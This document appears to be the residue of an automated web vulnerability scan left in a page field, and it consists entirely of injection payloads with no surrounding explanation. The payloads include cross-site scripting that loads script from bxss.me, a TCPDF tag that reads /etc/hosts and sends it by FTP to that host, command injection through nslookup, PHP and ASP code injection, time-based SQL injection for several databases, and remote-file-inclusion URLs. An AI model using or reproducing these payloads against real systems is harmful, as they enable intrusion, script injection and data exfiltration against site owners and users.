| 
    
    
    
${9999604+9999709}
   
    
    
${9999501+9999635}
   
    
    
${9999748+10000252}
   
    
    
   
    
    
${10000399+10000044}
   
    
    
${9999705+9999556}
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1170&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
${10000125+10000025}
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1172&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1172,6,0eea1,%22%5D"/>
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1174&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1175&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1175,6,0eea1,%22%5D"/>
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1177&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1178&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1178,6,0eea1,%22%5D"/>
   
    
    
response.write(9567564*9807485)
   
    
    
'+response.write(9567564*9807485)+'
   
    
    
"+response.write(9567564*9807485)+"
   
    
    
response.write(9696921*9269206)
   
    
    
'+response.write(9696921*9269206)+'
   
    
    
"+response.write(9696921*9269206)+"
   
    
    
${10000223+10000300}
   
    
    
${10000399+9999886}
   
    
    
'+response.write(9222486*9932156)+'
   
    
    
"+response.write(9222486*9932156)+"
   
    
    
${9999981+9999116}
   
    
    
${10000193+10000336}
   
    
    
${9999530+10000093}
   
    
    
set|set&set
   
    
    
${9999348+9999109}
   
    
    
${9999721+10000311}
   
    
    
&nslookup hR6PDOBx&'\"`0&nslookup hR6PDOBx&`'
   
    
    
$(nslookup Zyum63Ow)
   
    
    
&nslookup uNIiNcPb&'\"`0&nslookup uNIiNcPb&`'
   
    
    
response.write(9839704*9469107)
   
    
    
'+response.write(9839704*9469107)+'
   
    
    
"+response.write(9839704*9469107)+"
   
    
    
response.write(9924674*9733666)
   
    
    
set|set&set
   
    
    
'+response.write(9924674*9733666)+'
   
    
    
"+response.write(9924674*9733666)+"
   
    
    
$(nslookup dns.ce.\039586.6-1262.6.0eea1.\1.bxss.me)
   
    
    
'+response.write(9173351*9993819)+'
   
    
    
"+response.write(9173351*9993819)+"
   
    
    
&nslookup dns.ce.\039586.6-1264.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1264.6.0eea1.\1.bxss.me&`'
   
    
    
set|set&set
   
    
    
$(nslookup dns.ce.\039586.6-1266.6.0eea1.\1.bxss.me)
   
    
    
&nslookup dns.ce.\039586.6-1267.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1267.6.0eea1.\1.bxss.me&`'
   
    
    
set|set&set
   
    
    
$(nslookup dns.ce.\039586.6-1270.6.0eea1.\1.bxss.me)
   
    
    
&nslookup dns.ce.\039586.6-1272.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1272.6.0eea1.\1.bxss.me&`'
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1279&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1285&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1285,6,0eea1,%22%5D"/>
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1288&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1292&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1292,6,0eea1,%22%5D"/>
   
    
    
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=039586&r=6-1293&h=6-0eea1-2&/).slice(2),document.documentElement.appendChild(s))//'>
   
    
    
set|set&set
   
    
    
1'>"><script src=http://bxss.me/s?u=039586&r=6-1296&h=6-0eea1-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,039586,6-1296,6,0eea1,%22%5D"/>
   
    
    
$(nslookup AmtuiKMw)
   
    
    
&nslookup JJwSlPBd&'\"`0&nslookup JJwSlPBd&`'
   
    
    
set|set&set
   
    
    
$(nslookup Q7bxcV7N)
   
    
    
&nslookup 2YWmi8pA&'\"`0&nslookup 2YWmi8pA&`'
   
    
    
set|set&set
   
    
    
$(nslookup FusOdROy)
   
    
    
&nslookup C0DjAVtK&'\"`0&nslookup C0DjAVtK&`'
   
    
    
response.write(9428188*9750026)
   
    
    
'+response.write(9428188*9750026)+'
   
    
    
"+response.write(9428188*9750026)+"
   
    
    
response.write(9904973*9601997)
   
    
    
"+response.write(9904973*9601997)+"
   
    
    
response.write(9039684*9361280)
   
    
    
'+response.write(9039684*9361280)+'
   
    
    
"+response.write(9039684*9361280)+"
   
    
    
set|set&set
   
    
    
$(nslookup akDblRlK)
   
    
    
&nslookup NhOu8fAn&'\"`0&nslookup NhOu8fAn&`'
   
    
    
set|set&set
   
    
    
$(nslookup 8bh1BJm7)
   
    
    
&nslookup m42DAIwB&'\"`0&nslookup m42DAIwB&`'
   
    
    
set|set&set
   
    
    
$(nslookup LLneJYVk)
   
    
    
&nslookup uepgGi4w&'\"`0&nslookup uepgGi4w&`'
   
    
    
set|set&set
   
    
    
$(nslookup dns.ce.\039586.6-1432.6.0eea1.\1.bxss.me)
   
    
    
&nslookup dns.ce.\039586.6-1434.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1434.6.0eea1.\1.bxss.me&`'
   
    
    
set|set&set
   
    
    
$(nslookup dns.ce.\039586.6-1442.6.0eea1.\1.bxss.me)
   
    
    
&nslookup dns.ce.\039586.6-1444.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1444.6.0eea1.\1.bxss.me&`'
   
    
    
set|set&set
   
    
    
$(nslookup dns.ce.\039586.6-1446.6.0eea1.\1.bxss.me)
   
    
    
&nslookup dns.ce.\039586.6-1448.6.0eea1.\1.bxss.me&'\"`0&nslookup dns.ce.\039586.6-1448.6.0eea1.\1.bxss.me&`'
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
!(()&&!|*|*|
   
    
    
^(#$!@#$)(()))******
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
testasp.vulnweb.com
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
testasp.vulnweb.com
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1&n900108=v923987
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
;print(md5(acunetix_wvs_security_test));
   
    
    
';print(md5(acunetix_wvs_security_test));$a='
   
    
    
";print(md5(acunetix_wvs_security_test));$a="
   
    
    
${@print(md5(acunetix_wvs_security_test))}
   
    
    
${@print(md5(acunetix_wvs_security_test))}\
   
    
    
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
   
    
    
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
   
    
    
-1; waitfor delay '0:0:6' --
   
    
    
-1); waitfor delay '0:0:6' --
   
    
    
1 waitfor delay '0:0:6' --
   
    
    
T4HZ139r'; waitfor delay '0:0:9' --
   
    
    
-1;select pg_sleep(9); --
   
    
    
-1);select pg_sleep(9); --
   
    
    
-1));select pg_sleep(9); --
   
    
    
gmoZMgtp';select pg_sleep(9); --
   
    
    
MkCJGgXj');select pg_sleep(9); --
   
    
    
lMqfq7RL'));select pg_sleep(3); --
   
    
    
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
   
    
    
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/
   
    
    
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
   
    
    
-1; waitfor delay '0:0:4' --
   
    
    
-1); waitfor delay '0:0:4' --
   
    
    
1 waitfor delay '0:0:4' --
   
    
    
JeCr8XNF'; waitfor delay '0:0:8' --
   
    
    
-1;select pg_sleep(8); --
   
    
    
-1;select pg_sleep(0); --
   
    
    
-1;select pg_sleep(4); --
   
    
    
-1);select pg_sleep(8); --
   
    
    
-1));select pg_sleep(8); --
   
    
    
F03lEXcA';select pg_sleep(8); --
   
    
    
TY9kFn2Q');select pg_sleep(8); --
   
    
    
Kbvz8OeY');select pg_sleep(4); --
   
    
    
MGoms7jL'));select pg_sleep(12); --
   
    
    
if(now()=sysdate(),sleep(15),0)/*'XOR(if(now()=sysdate(),sleep(15),0))OR'"XOR(if(now()=sysdate(),sleep(15),0))OR"*/
   
    
    
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
   
    
    
1 waitfor delay '0:0:15' --
   
    
    
5z6BYOBG'; waitfor delay '0:0:5' --
   
    
    
-1);select pg_sleep(5); --
   
    
    
-1));select pg_sleep(5); --
   
    
    
RCBRTDOz';select pg_sleep(5); --
   
    
    
1nBONQJh');select pg_sleep(5); --
   
    
    
K0lUhKRh'));select pg_sleep(10); --
   
    
    
1
   
    
    
1
   
    
    
1
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
testasp.vulnweb.com
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
-1 OR 2+375-375-1=0+0+0+1 --
   
    
    
-1 OR 3+375-375-1=0+0+0+1 --
   
    
    
-1 OR 2+964-964-1=0+0+0+1
   
    
    
testasp.vulnweb.com
   
    
    
-1 OR 3+964-964-1=0+0+0+1
   
    
    
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
   
    
    
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
   
    
    
1some_inexistent_file_with_long_name .jpg
   
    
    
Http://testasp.vulnweb.com/t/fit.txt
   
    
    
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
   
    
    
http://testasp.vulnweb.com/t/fit.txt?.jpg
   
    
    
-1; waitfor delay '0:0:9' --
   
    
    
1
   
    
    
-1); waitfor delay '0:0:9' --
   
    
    
1
   
    
    
1 waitfor delay '0:0:3' --
   
    
    
1
   
    
    
uVBZ6Zk8'; waitfor delay '0:0:3' --
   
    
    
-1;select pg_sleep(3); --
   
    
    
-1);select pg_sleep(3); --
   
    
    
-1));select pg_sleep(3); --
   
    
    
Jj7NNoUA';select pg_sleep(6); --
                                                                                                                                                                                                                                                            |